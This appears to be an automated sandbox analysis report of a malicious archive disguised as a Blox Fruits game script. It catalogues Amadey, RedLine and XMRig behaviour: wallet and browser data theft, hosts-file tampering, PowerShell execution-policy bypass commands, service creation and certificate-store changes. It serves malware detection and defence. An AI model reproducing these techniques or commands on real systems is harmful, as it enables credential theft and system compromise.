Analysis Overview
SHA256
37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Threat Level: Known bad
The file Blox_Fruits_Script.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Amadey
RedLine
RedLine payload
XMRig Miner payload
Drops file in Drivers directory
Creates new service(s)
Stops running service(s)
Checks BIOS information in registry
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Modifies system executable filetype association
Launches sc.exe
Checks installed software on the system
Executes dropped EXE
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 10:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
144s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
Files
memory/3732-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240214-en
Max time kernel
117s
Max time network
129s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2bc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/932-4-0x0000017472720000-0x0000017472742000-memory.dmp
memory/932-5-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp
memory/932-6-0x000001745A270000-0x000001745A280000-memory.dmp
memory/932-7-0x000001745A270000-0x000001745A280000-memory.dmp
memory/932-10-0x00000174729D0000-0x0000017472A46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2nzzbxdd.cwl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/932-32-0x000001745A270000-0x000001745A280000-memory.dmp
memory/932-41-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
118s
Max time network
141s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
148s
Max time network
142s
Command Line
Signatures
Amadey
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 1620 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0222 | C:\Users\Admin\AppData\Roaming\services\plugin0222 |
| PID 4352 set thread context of 2928 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 4352 set thread context of 196 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 4632 set thread context of 164 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0222 | C:\Users\Admin\AppData\Roaming\services\3plugin0222 |
Checks installed software on the system
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0222 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0222 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0222 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0222 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0222 |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0f